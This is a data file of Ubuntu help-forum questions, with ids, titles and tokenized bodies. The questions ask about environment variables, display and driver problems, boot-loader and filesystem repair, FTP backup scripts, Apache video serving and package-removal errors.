381425	how to change environmental variable permanently ?	i am trying to use third party packages in python . to import all the modules i need to update pythonpath . i read several blogs on it but still i have following questions unanswered . is sys.path & pythonpath are same things ? ( probably not ) how to see current value of pythonpath ( which is something called environmental variable ) ? how to update pythonpath permenently ? i know i can do sys.path.append ( '/ < path > ' ) , but that updates sys.path until you do not exit the python interpreter . export `pythonpath= $ pythonpath : / < path > ( i know this but i do not know what is current $ pythonpath ) how do i update pythonpath permanently ?
381427	laptop brightness	i have just installed ubuntu 13.10 and trying to adjust my laptop screen brightness . my laptop dell studio 1558 has a key to change the screen brightness , though i reduced brightness to zero , i still see the brightness did n't change at all . because of this my battery to running out quickly . is there any software which really makes a change in brightness . i have tried the 'brightness and lock ' in ubuntu , but of no use . your help is really appreciated .
381430	the ifconfig command is not running	i am using kali linux through vmware . i tried to use ifconfig command . but it shows error message command doest exist . please give me a solution .
381431	errors on xfce startup , update-notifier-crash	i get an error pop-up every time i log in , it says system service crashed or some thing like that.. i 'm pretty sure this is what is happening.. any insight ? openconnection : connect : no such file or directory can not connect to brltty at :0 script for cjkv started at run_im . script for default started at run_im . init : update-notifier-crash ( /var/crash/_usr_bin_xorg.0.crash ) main process ( 3280 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_bin_thunar.1000.crash ) main process ( 3279 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_lib_tracker_tracker-miner-fs.1000.crash ) main process ( 3283 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_sbin_sfcbd.0.crash ) main process ( 3285 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_share_software-center_software-center.1000.crash ) main process ( 3286 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_bin_xscreensaver.1000.crash ) main process ( 3281 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_lib_x86_64-linux-gnu_tumbler-1_tumblerd.1000.crash ) main process ( 3284 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_bin_python3.3.1000.crash ) main process ( 3269 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_lib_firefox_plugin-container.1000.crash ) main process ( 3282 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_bin_software-properties-gtk.0.crash ) main process ( 3278 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_bin_pavucontrol.1000.crash ) main process ( 3264 ) terminated with status 1 edit . i reinstalled with a new home and got the same result once i tried to get ati drivers to work , i had installed gnome in order to get to a session , that is when they started , whether it was gnome or ati i dont know . new xsession-errors openconnection : connect : no such file or directory can not connect to brltty at :0 script for cjkv started at run_im . script for default started at run_im . init : update-notifier-crash ( /var/crash/_usr_bin_xscreensaver.1000.crash ) main process ( 26175 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_lib_firefox_firefox.1000.crash ) main process ( 26176 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_bin_thunar.1000.crash ) main process ( 26173 ) terminated with status 1 init : update-notifier-crash ( /var/crash/_usr_bin_xorg.0.crash ) main process ( 26174 ) terminated with status 1
381432	desktop seems to have reset to default or like new , all my files are gone off the computer ! what did i do !	i was trying to install netflix on ubuntu 12.04 . i could n't get netflix to work , so i was in forums reading and trying fixes that folk had posted . in the process , something got changed or deleted not sure what . any way i restarted my computer and every thing had changed . the background pic had reset to default , all the file folders were going off my desk top . almost all the icons in the menu bar were gone and seemed to have be reset to default . it was as though i had just installed ubuntu on my computer and every thing was new and wiped clean . dose any one have any idea what i might have done and how i can at least get my photos and files back ?
381438	autokey ( gtk ) is not starting up with its gui ?	when i start it again it says autokey ( gtk ) is already running as pid : 14564 the predefined autokey definitions are working fine but the gui is not coming up so that i can add more definitions . help me to fix this out . some sources says that press super key + k to bring the gui but where should i press it i tried that but not working ? i pressed win key + k when i started the gui its not working help me
381439	need driver for dell printer v515w	i need to have a driver to run my dell v515w printer , scanner , fax .
381442	sabrent usb display cards	i am brand new to linux and have just installed ubuntu 13.04 on my dell inspiron e1705 laptop with a dual boot to windows vista . everything works except my 2 sabrent usb display cards . one of the monitors connected to the card will display text only ; but , only when the computer is going thru the shutdown sequence .
381444	cpu frequency scaling is n't working , but did before	i have an amd 8320 on a msi 990fxa-gd80 v2 i was doing some tweaking to my bios trying to increase power and what not and everything is fine in that regard , but upon reboot my cpu frequency scaling indicator reports my cpu does n't support frequency scaling even though previously this was working . i tried returning bios settings to factory defaults , but it refuses to work . how can i get my frequency scaling back ? cat /proc/cpuinfo processor : 0 vendor_id : authenticamd cpu family : 21 model : 2 model name : amd fx ( tm ) -8320 eight-core processor stepping : 0 microcode : 0x6000822 cpu mhz : 3762.510 cache size : 2048 kb physical id : 0 siblings : 8 core id : 0 cpu cores : 4 apicid : 16 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 sse4_1 sse4_2 popcnt aes xsave avx f16c lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 tce nodeid_msr tbm topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold bmi1 bogomips : 7525.02 tlb size : 1536 4k pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical , 48 bits virtual power management : ts ttp tm 100mhzsteps hwpstate cpb eff_freq_ro
381445	mgwtools error when installing ubuntu desktop on aws ubuntu 13 server	i have a ubuntu 13 server on aws . i 'm trying to install the ubuntu-desktop package , so that i can install a browser ( firefox ) etc . i 'm getting a message about mgwtools ( see bold text below ) ubuntu @ ip-172-31-21-244 : ~ $ sudo apt-get install xubuntu-desktop reading package lists ... done building dependency tree reading state information ... done **e : the package mgwtools needs to be reinstalled , but i ca n't find an archive for it . ** what is mgwtools ? is there some way to get around this issue ?
381447	restoring the mbr	while following instructions from this page i accidentally deleted the mbr . i do however still have a backup of the mbr . i tried to resore it using the following command $ dd if=mbr-backup of=/dev/hdx bs=512 count=1 unfortunately the output from this command is opening ‘mbr-backup’ : no such file or directory does anyone know how to restore my mbr-backup ?
381448	editing/viewing kde activity config files	is there a good way to edit your activities in a list , and edit other attributes about them ? like have particular applications launch on specific viewports/geometries with wmctrl when an activity is first started ( after boot ) ? this is what i 've done so far : i found that there was a database file at ~/.kde/share/apps/activitymanager/resources/ and i wanted to know how to open it . kexi reports the following : database project `` ~/.kde/share/apps/activitymanager/resources/database '' does not appear to have been created using kexi and can not be opened . it is an sqlite file created using other tools . while opening it with kate , i was told that the document had changed as i was viewing it . i 've installed sqlite , and got mostly uninterpretable lists and what i assume is hex . i 'm assuming that this file ( and the other database file at ~/.kde/share/apps/activitymanager/activityranking ) are system files . is it best not to touch them ?
381452	ubuntu ftp server - hetzner	i have an ftp backup server in hetzner with details backup server : u*****.your-backup.de i am trying to connect to it through my ubuntu server using command $ ftp u*****.your-backup.de and i see ftp > then trying to upload my postgresql database backup file using command ftp > put /home/*myhomedir*/dropbox/backup/rajedb.backup local : /home/*myhomedir*/dropbox/backup/rajedb.backup remote : /home/*myhomedir*/dropbox/backup/rajedb.backup 200 eprt command successful 550 /home/*myhomedir*/dropbox/backup/rajedb.backup : no such file or directory ftp > put /home/*myhomedir*/dropbox/backup/ local : /home/*myhomedir*/dropbox/backup/ remote : /home/*myhomedir*/dropbox/backup/ /home/*myhomedir*/dropbox/backup/ : not a plain file . ftp > put /home/*myhomedir*/dropbox/backup/rajedb local : /home/*myhomedir*/dropbox/backup/rajedb remote : /home/saksham/dropbox/backup/rajedb local : /home/*myhomedir*/dropbox/backup/rajedb : no such file or directory now my question is : how do i take backup of my files in hetzner server ? and how do i download them when ever required ? . and i want to take backup of my files for every 30minutes or 1hour . thanks .
381455	option screen unreadable	anything with options such as the system update screen or the winetricks screen is unreadable , i 'll put it in either fullscreen or drag it out but the actual option section does n't increase in size , it just adds more grey area . i 'm using ubuntu 13.10 with gnome 3.1 , is there any command or anything to fix this ? would reverting back to the default ubuntu style work ?
381461	can not login to ubuntu from login screen but from terminal i can login fine	i have tried removing the .xauthority file and also tried chown -r $ user : $ user $ home and reboot . also tried a few other tricks given on most forums but to no avail . what is the problem here ?
381462	asus f201e-kx063du wlan problem 12.04	i recently bought an asus f201e-kx063du netbook which was delivered with an ubuntu 12.04 preinstalled . i went through the whole installation process and everything went fine except the wlan connection is showing a lot of extremly weird bugs . sometimes it works just fine and everything runs smooth and quick and in the next second i suddenly lose connection or the connection becomes extremly slow ( loading google.com takes about 10 minutes ) without any reasons . another weird thing is that i can connect to the wlan at my university but not at my friends university . they are both using the same wlan network with exactly the same name , security , hard-and sofrtware . i really have no idea what i could do to solve this problem . if you need any further information please tell me , im not sure what else to tell you . thank you ! ps : i googled the problem and searched for a solution for a couple of hours but i i couldnt find anything that would help me . pps : sorry for the horrible english ; )
381464	login in virtual terminal	yesterday i installed my new ubuntu - wow ! ubuntu is a very cool . today i want to work ob my project , but i become following error : i already found a solution : how to fix `` the system is running in low-graphics mode '' error ? i started the virtual terminal with ctrl + alt + f1 ... how can i log in now in the virtual terminal ? i must install a nvidia-driver . greets sorry for my not so good english - i 'm in the 6th grade
381465	changing unity launcher settings has no effect	i have just installed ubuntu 13.10 and am completely inexperienced with linux . i tried to adjust the launcher settings by doing things like changing the icon size , having the launcher on only one screen ( am using dual screen ) , and auto hiding the launcher ; changing any of these settings has no effect on the launcher , it just stays the same . how can i fix this ? edit : i just went into the system settings , appearance and used the slider to attempt to change the launcher icon size . from there i went to the behaviour tab and clicked `` auto-hide the launcher '' on , this had no effect either . i also went to the displays option in system settings and tried to change which screen the launcher appeared on from the drop down menu beside launcher placement , this also had no effect . thanks heaps : )
381466	issues with mouse and trackpad	my , ubuntu install crashed yesterday , and it was more or less beyond salvage , so i just re installed ubuntu again , ( 12.04.3 , 32 bit ) . now the install is fine , my updates are being downloaded as i write this question , but , one major issue is with the trackpad and the mouse . when i 'm on the net and i want to select something , i need to hold on to my left mouse button for 2-3 seconds before i can proceed to dragging it across the text and thereby select it . the same applies for any document really , i did specifically mention the net , but it applies for any sort of text really . how can this be sorted ?
381468	`rm -rf ` and `rm -r` have the same results	bear in mind that i just learning bash so please explain in moderate terms . rm -rf and rm -r appear to do the same thing . the tutorial ( https : //help.ubuntu.com/community/beginners/bashscripting ) states that -f is force , and the computer will not ask permission to delete a file . to test this i created a locked file but -r and -rf achieve the same results of not deleting the file ( permission denied ) . why is this ?
381473	how can i make touchpad not change workspace in xubuntu 13.10 ?	in xubuntu 13.10 horizontal scrolling changes workspace . i do n't want it to , so how do i disable it ? in lubuntu i can change ~/.config/openbox/lubuntu-rc.xml .
381474	how can i test unity 8 on the desktop ?	how can i run unity 8 full-screen running mir natively like in this video : http : //www.youtube.com/watch ? v=e9azrxsnfte thanks .
381476	grub rescue error : no such partition on new install dual boot with xp	windows xp will soon be dead : ) and my laptop is getting a bit long in the tooth ( 7 yrs ) so decided to install ubuntu desktop on it to see if the laptop can last a bit longer . because there are files on the xp disk and i have to wean my wife off windows i 'm going to dual boot so we can access the files and be able to boot back into xp if there 's something we cant do in ubuntu ( yet ) . trouble is , i installed 13.04 desktop ( x86 ) and accepted the default partition option provided by the installer which created a partition out of free space on the 2nd partition on the disk . after a reboot i got the `` error : no such partition '' message from grub . i 've since downloaded 13.10 and went for the upgrade option and still get the same error . i do n't want to give up just yet and repair the xp installation so i can boot into that so really need some help to get the boot loader to work and allow me to dual boot . i ran the boot repair util which has n't fixed it but the report is here : http : //paste.ubuntu.com/6467187/ while i have experience with ubuntu server i 've never had to go anywhere near grub and it 's a mystery to me . all the reports i 've found through search seem to refer to issues with deleting ubuntu partitions which is not what i 'm trying to do here . any help is appreciated , i 'm happy to follow instructions to edit grub settings or even do the installation over again . cheers .
381477	ubuntu gnome frozen after login	i just installed ubuntu gnome 13.10 . after the restart everything works perfectly . then i install the recommended updates and when i restart , i just get a dark screen were i can see the mouse pointer but nothing else . i 've tried to reinstall ubuntu-desktop and gnome shell ( changing the terminal ) but with no effect . it happened to me this morning , so i reinstalled ubuntu , but i had the same problem . any ideas or solution ?
381479	how to change login-screen background on 13.10	i tried it with gsettings and was able to deactivate the grid and disable the user backgrounds . but changing the background did n't work , now there 's no background shown . the background-picture is in /usr/share/backgrounds and it is readable for everyone . when i use gsettings there is an error message ( three times ) : ( process:3777 ) : dconf-critical ** : unable to create directory '/run/user/1000/dconf ' : permission denied . dconf will not work properly . but the values are taken anyway ( controlled with gsettings get ... ) bug ? edit : here is described how i tried to change the background : how do i change the wallpaper in lightdm ? ( first answer ) edit2 : user with a similar problem : lightdm/unity-greeter wallpaper will not set
381482	how do i use multiple monitors without xinerama yet retain window dragging ?	specifically i want my main monitor ( 1920x1080 ) to retain 3-4 virtual desktops , and use the secondary monitor ( 1280x1024 ) as a separate desktop . yet be able to drag windows backwards and forwards . the 2nd monitor should not have multiple desktops , or if it does these should change only when i change them manually on the 2nd monitor ( and not synced with the virtual desktops on the primary monitor ) . edit : essentially have a total of four virtual desktops , three of which are on one monitor , one on the 2nd . i 'm using a single ( amd ) radeon hd5770 , though if push came to shove i could add another gpu ( i 'd rather not ) . the 2nd monitor is intended for 2d tasks mostly web/text/spreadsheets/etc . however the primary display needs 3d , also while i 'm not a complete newb with linux nor am i a power user ( probably ) so fairly simple instructions would be good ... ; ) i 'd be happy to install different software commercial or otherwise if that would lead to a solution . further edit : i 'm running kubuntu 13.04 if that can make a difference ... and another edit : i do n't actually need to drag windows , but i do need to be able to send a window from one monitor to the other ( and back ) generally if they can retain their content ( web page/document/etc ) they can be closed and re-opened .
381485	how to install comodo antivirus in ubuntu ?	i have installed comodo antivirus in ubuntu 12.04 . now it had installed , but after running it it shows to run a script . please help me to install comodo antivirus ( or suggest any good antivirus ) .
381487	ubuntu ftp script to take backup and upload in my ftp server	hie all i am trying to backup of my application directory , database backup and then sending it to my ftp server at hetzner by using the following script and i get few errors my server details : ubuntu12-04 ( in hetzner ) database : postgresql8.4 my ftp server : hetzner trying to take backup at ubuntu12.04 server and copying in ftp my server bakupscript.sh site=ftp : //u***.your-backup.de username=u*** passwd=******************* backupdir=/opt/openbravo-erp filenameob= '' openbravo-erp.tar.gz '' echo `` creating a ob backup file $ filenameob of $ backupdir . '' # make a tar gzipped backup file tar -cvzf /home/hetznerftp/ '' $ filenameob '' `` $ backupdir '' echo `` creating a db backup file $ filenamedb of ob database . '' export pgpassword= '' *my db password* '' backup_dir= '' /home/manideep/hetzner/ '' # string to append to the name of the backup files pg_dump -h localhost -u tad openbravo -fc $ i > $ backup_dir $ i\rajedb.backup # login into ftp server ftp -in < < eof open $ ftp_site user $ username $ passwd bin put /home/manideep/hetzner $ filenameob put /home/manideep/hetznerftp/pgdump.backup close bye when i try executing that script through command ./backupscript.sh i get following error creating a backup file openbravo-erp.tar.gz of /opt/openbravo-erp . creating a db backup file of ob database . ./hetznerbkup.sh : line 28 : warning : here-document at line 21 delimited by end-of-file ( wanted `eof ' ) ( to ) usage : open host-name [ port ] not connected . not connected . not connected . not connected . how do i send those files through script ? and will this replace the existing files while i use command put in ftp in ftp server if not how do i do it ? thankyou
381493	how to do nat from server with usb 3g modem internet access ?	firstly , apologize me for confusing you guys with the tittle . i 'm learning ubuntu server at my school ( currently : configuring nat , and dns server ) . sometime , i need to practice things which my master has been taught by myself in my house . but , i have a problem . that is topology designed by my master that i configured in the last week . the goal is to make client has capability to access the internet . fyi , server is already set up online to the internet ( dunno the type of connection is used ) by my master . so , i just had to give router 's ( ubuntu server 12.04 ) eth0 interface an ip address which is on the same network with server 's address . the theorum was : make server 's ip address as default gateway , then input an additional line to /etc/resolve.conf , and run simple iptables -t nat command , then adjusting client 's ip address option . then it should be done . can i practice it in my house , where server does n't exist ? i only have : a pc with ubuntu running on it , a laptop with ubuntu running on it , network cable , and usb 3g modem .
381494	nvidia gforce 700 series drivers issues on unbuntu 12.4 , help !	i have an older hp media center pc from like 2006 , it runs pretty good with windows7 home premium , but i wanted to try ubuntu linux 12.4lts on my machine . i installed the ubuntu os while in windows 7 , which installed fine . my problem was when i restarted my computer and booted into linux/ubuntu the os would start to scramble or get lines on the screen which indicated to me a graphics issue . i tried to get to the ubuntu software center to install the drivers but they are not there and the os graphics seems to now freeze up and scramble before and after logging in . i downloaded the compatible ubuntu drivers from nvidia for my graphics card already , but i wanted to know if their was a way to install the drivers off a usb flash drive using the ubuntu terminal or safe mode before booting into the ubuntu os ?
381496	start compiz with additional options , but from which script ?	i 'm experiencing general sluggishness on my ubuntu 12.04 desktop and read at http : //www.thinkwiki.org/wiki/nvidia_quadro_nvs_140m ( which is my graphics card ) that the following env variable and options to compiz may fix the issue : export libgl_always_indirect=1 compiz ccp -- indirect-rendering -- loose-binding -- sm-disable -- replace what is the best file from which to issue the above commands ? i am having difficulty finding the script that executes compiz at login . according to the ps command , compiz is started by gnome-session -- session=ubuntu and a look in /usr/share/gnome-session/sessions/ubuntu.session shows references to compiz but i am not sure that this is the correct place to pass options to compiz and set the above env variable .
381497	smplayer h.264 decoding problem on 4670k haswell	when i playing h.264 mpeg-2 video , and take four threads of decoding equal number of cores in my cpu ( 4670k haswell ) . i got the following error in mplayer log : mplayer interrupted by signal 11 in module : video_read_frame id_signal=11 - mplayer crashed by bad usage of cpu/fpu/ram . recompile mplayer with -- enable-debug and make a 'gdb ' backtrace and disassembly . details in docs/html/en/bugreports_what.html # bugreports_crash . - mplayer crashed . this should n't happen . it can be a bug in the mplayer code _or_ in your drivers _or_ in your gcc version . if you think it 's mplayer 's fault , please read docs/html/en/bugreports.html and follow the instructions there . we ca n't and wo n't help unless you provide this information when reporting a possible bug . but if i use one thread of decoding , video is playing , and mplayer does not report an errors .
381498	how to cut off the power supply of the mouse , keyboard and speakers after shut down my computer ?	how to cut off the power supply of the mouse , keyboard and speakers after shut down my computer ? although the computer is shut down , the light of mouse , keyboard and speakers are still here . it seems wasting energy . how to tackle this problem ? thank you for your attention
381499	ubuntu 12 hdmi-tv bad picture	my problem is my new asus f201 linux ubuntu laptop and hdmi . when i connect computer to tv via hdmi , picture is shown on tv but all colors are little bit messed up . in windows computers i would normally update my graphics drivers , how this is done in ubuntu or is there something else what i should try to get colors shown in a right way on tv ?
381500	getting rid of `` earlier version of windows '' on a dual boot ubuntu/windows7 system	i started with a clean xp install ( < - my original boot partition - partition1 ) i then added a win7 side-by-side on partition2 . then i added ubuntu 12.04 lts with grub boot on partition3 . grub gives me the option for windows7 . this presents me with the `` earlier version of windows '' / '' windows7 '' windows boot menu . everything works fine ! ! however - i now want to remove xp all together . i deleted all the files and resize the xp partition to 5gb . but it is still marked as boot partition and i am afraid to delete it all together any hints on how to completely remove this partition this link suggests how to remove the `` earlier version '' message http : //www.nextofwindows.com/how-to-remove-earlier-version-of-windows-in-windows-7-bootloader-with-bcdedit-command-line-utility/ but i will still be stuck with an ugly 5gb partition i dont need . any hints i am on a quadcore , intel , single sas 500gb disk , ubuntu lts 12.04 , grub2 bootloader
381502	problem with playing mp4 file on apache hosted webpage	i hope someone could assist me . my problem is : i want to achieve playing a mp4 file in webpage hosted by my apache2 server . now i tried everything but he keeps giving me nothing . first my php pages are located in default : /var/www in each php page i build a litle piece of my complete path that i need to acces the mp4 file in my html 5 video tag . second my video 's are located in /media/disk1/video i also noticed on some blogs that you had to alter the apache2/sites-enabled/000-default file the thing i added is written in red . so i did like this < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /var/www < directory /var/www/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > < directory /media/disk1/video > allowoverride none < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- and restarted my apache2 3de i printed the complete path on the final php page to make sure i had formed the correct path , and this is the case . i also made sure my mp4 files or path only contained alfabethic characters . as last resort i tried to understand why my vids were n't played . i went to my browser i tried to give the path in like this ipadressofserver/media/disk1/video/series/suits/suitss03e04.mp4 the result : i got the error 404 not found ... how to solve this issue ? i would be very glad if someone could share their insight on this problem .
381503	can not find my windows bootloader screen	i had installed ubuntu on my laptop some days back . feeling no longer use for it i simply deleted the two drives on which ubuntu was installed via windows 7 and merged them to a certain partition . now , i can not see my old windows bootloader screen . i tried finding it out over the web and they said to run the wiondows repair from the installation disk but my disk has no such option available throughout the installtion process . is there any other way possible to restore my bootloader screen ?
381504	the web server software is running but no content has been added , yet	i want to access phpmyadmin from everywhere.i have assigned port forwarding and when i enter my static ip in browser from another network then it is showing `` it works ! '' this is the default web page for this server . the web server software is running but no content has been added , yet . phpmyadmin login page is opening in local network but i want to access it from globally . could you please help me ?
381506	delete characters from cursor up to the beginning	i 'm confused , ctrl+k deletes characters from the cursor up to the end of the line . but why does ctrl+u delete the whole line ?
381507	after installing kde-full package at start-up nautilus automatically opens my home folder	i have installed the kde-full package on ubuntu 12.04 in order to switch to the kde plasma workspace as well as install the other applications . it works well with just one problem that i ca n't understand . whenever i start a new session nautilus opens up my home folder and i have to manually close it . it 's pretty annoying , but i do n't want to uninstall nautilus just to stop this behavior . i have already looked into my ~/.bashrc and i have n't seen any additions which would make nautilus do this . i 've found the answer in a similar question here , i verified it and it works for me , so i will close this question .
381508	chipset unkown - airmon-ng	root @ ubuntu : ~ # airmon-ng interface chipset driver mon0 unknown iwlwifi - [ phy0 ] mon1 unknown iwlwifi - [ phy0 ] mon2 unknown iwlwifi - [ phy0 ] wlan0 unknown iwlwifi - [ phy0 ] root @ ubuntu : ~ # iwconfig mon0 ieee 802.11abgn mode : monitor tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off mon1 ieee 802.11abgn mode : monitor tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off mon2 ieee 802.11abgn mode : monitor tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : off/any mode : managed access point : not-associated tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off which one should i choose ?
381510	partial upgrade	i did n't log on the internet for about a week then when i got connected to the internet i tried to update the system i 'm running ubuntu 13.10 it said it needs partial upgrade .when i click partial upgrade , it says that the system is up to date and cancels . when i click `` continue '' , it says software index is broken .it is impossibe to install or remove any software .please use the package manager synaptic or run sudo apt-get install -f in terminal to fix the issue at first . i did that . that 's the outcome in terminal.. '' the following packages will be removed : linux-image-3.11.0-12-generic linux-image-extra-3.11.0-12-generic 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . 17 not fully installed or removed . after this operation , 136 mb disk space will be freed . do you want to continue [ y/n ] ? `` i click y but it does n't work .that 's the outcome ... `` ( reading database ... 401370 files and directories currently installed . ) removing linux-image-extra-3.11.0-12-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : deleting /boot/initrd.img-3.11.0-12-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic /usr/sbin/grub-mkconfig : 11 : /etc/default/grub : splash : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-extra-3.11.0-12-generic.postrm line 328. dpkg : error processing linux-image-extra-3.11.0-12-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 removing linux-image-3.11.0-12-generic ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic update-initramfs : deleting /boot/initrd.img-3.11.0-12-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-12-generic /boot/vmlinuz-3.11.0-12-generic /usr/sbin/grub-mkconfig : 11 : /etc/default/grub : splash : not found run-parts : /etc/kernel/postrm.d/zz-update-grub exited with return code 127 failed to process /etc/kernel/postrm.d at /var/lib/dpkg/info/linux-image-3.11.0-12-generic.postrm line 328. dpkg : error processing linux-image-3.11.0-12-generic ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : linux-image-extra-3.11.0-12-generic linux-image-3.11.0-12-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) amr @ amr-compaq-presario-cq61-notebook-pc : ~ $ `` can anyone help me please ?
381514	is my file system dead ?	yesterday i decided to update my system from 10.04 lts to 12.04 lts . i downloaded desktop ubuntu for i386 .iso and made a liveusb ( using unetbootin ) . i choose try ubuntu without installing and there i run install and choosed update ubuntu from 10.04 to 12.04 . and at the begining of the update system just stucked and i made reboot . and now grub looks like this and when i try to choose ubuntu instead of loading it there appers messages like i tried to check and fix partitions using gparted from liveusb and treid use sudo fsck.ext4 -f /dev/partition_on_disk . but all thing still the same . what else can help ? also i tried update grub but nothing changed too
381518	recover from a corrupted filesystem when fsck do not help	something went wrong with my filesystem , ubuntu set it to read-only and now under ubuntu live disc , fsck ca n't fix it . i 'm running 13.04 and it wo n't boot - at startup , it just shows the grub rescue prompt . it 's a straight-forward setup , just one hard drive on /dev/sda1 but it wo n't even mount . the install program can see the partition , that it 's ext4 and that it 's the boot partition . however it seems that i ca n't rescue the filesystem by doing an ubuntu installation with the ubuntu live disk because it gives no indication whether it 's about to overwrite the whole lot so i do n't want to risk it . i 've got a back-up using backuppc but stupidly i lost my rescue disks . i 'd rather avoid a full installation followed by a restore which i 've no experience at executing . the crux of the matter is that fsck says it fixes everything but actually does n't , so the next time i run it , i get exactly the same error messages and fixes . here 's the output : ubuntu @ ubuntu : ~ $ sudo fsck.ext4 -vy /dev/sda1 e2fsck 1.42.8 ( 20-jun-2013 ) ext2fs_check_desc : corrupt group descriptor : bad block for block bitmap fsck.ext4 : group descriptors look bad ... trying backup blocks ... block bitmap for group 0 is not in group . ( block 2553887680 ) relocate ? yes inode table for group 0 is not in group . ( block 2440124416 ) warning : severe data loss possible . relocate ? yes one or more block group descriptor checksums are invalid . fix ? yes group descriptor 0 checksum is 0x761e , should be 0xcf25 . fixed . block bitmap for group 4352 is not in group . ( block 2553887680 ) relocate ? yes inode table for group 4352 is not in group . ( block 3731970048 ) warning : severe data loss possible . relocate ? yes group descriptor 4352 checksum is 0x5eda , should be 0x3da3 . fixed . inode bitmap for group 4353 is not in group . ( block 2785042439 ) relocate ? yes group descriptor 4353 checksum is 0xd8b1 , should be 0xedfb . fixed . inode bitmap for group 4354 is not in group . ( block 838860807 ) relocate ? yes group descriptor 4354 checksum is 0x1718 , should be 0x0438 . fixed . inode bitmap for group 4355 is not in group . ( block 771751943 ) relocate ? yes group descriptor 4355 checksum is 0x0bc8 , should be 0x4170 . fixed . fsck.ext4 : e2fsck_read_bitmaps : illegal bitmap block ( s ) for /dev/sda1 /dev/sda1 : ***** file system was modified ***** /dev/sda1 : ********** warning : filesystem still has errors ********** ubuntu @ ubuntu : ~ $ that is exactly the same as it was 10 times earlier and i 'm sure the next ten times i try it - exactly the same checksums and block ids . any help gladly received ! thanks . edit : basically i guess the question is : is this filesystem repairable in situ now or does that info from fsck mean my disk is dead ? and if it 's not dead , what can i do above and beyond what i did with fsck ? edit : used tune2fs to identify superblocks and ran e2fsck -b 01234 /dev/sda1 as an alternative to fsck ... no effect . edit : trying testdisk which tells me the partition is bad . ... ok testdisk does n't seem to offer much .
381522	tool to disable services and daemons	for the old ( and still used in debian ) init mechanism there are tools such as rcconf to disable services and daemons . are there such for whatever is used in ubuntu ( upstart i guess ) ? i am running 12.04.3 . ( i know you can disable some by messing with the files in /etc/init directory , but i would prefer a tool like rcconf . ) it does not have to be graphical . i know how to install and use rcconf , but ubuntu uses a newer init mechanism , and i do not think rcconf works with that . services-admin apparently provided by gnome-system-tools seems good , although might have dependencies i want to avoid on my minimal install .
381523	having issues installing qemu , pixman autoreconfig missing	i dont understand this error message from the `` make '' function . qemu-1.7.0-rc1/pixman ; autoreconf -v -- install ) /bin/sh : 1 : autoreconf : not found make : * [ /home/alex/desktop/qemu-1.7.0-rc1/pixman/configure ] error 127 how would i get this to work ? do i install pixman or autoreconfig ?
381528	portable software in linux	can someone tell me how to create a portable application . i want to create a portable application of grive client . in my school i do n't have the right to install anything . thanks .
381530	how to dual boot black box linux with ubuntu ?	i want to dual boot black box 3 along with ubuntu 12.04 . how do i go about achieving the same ?
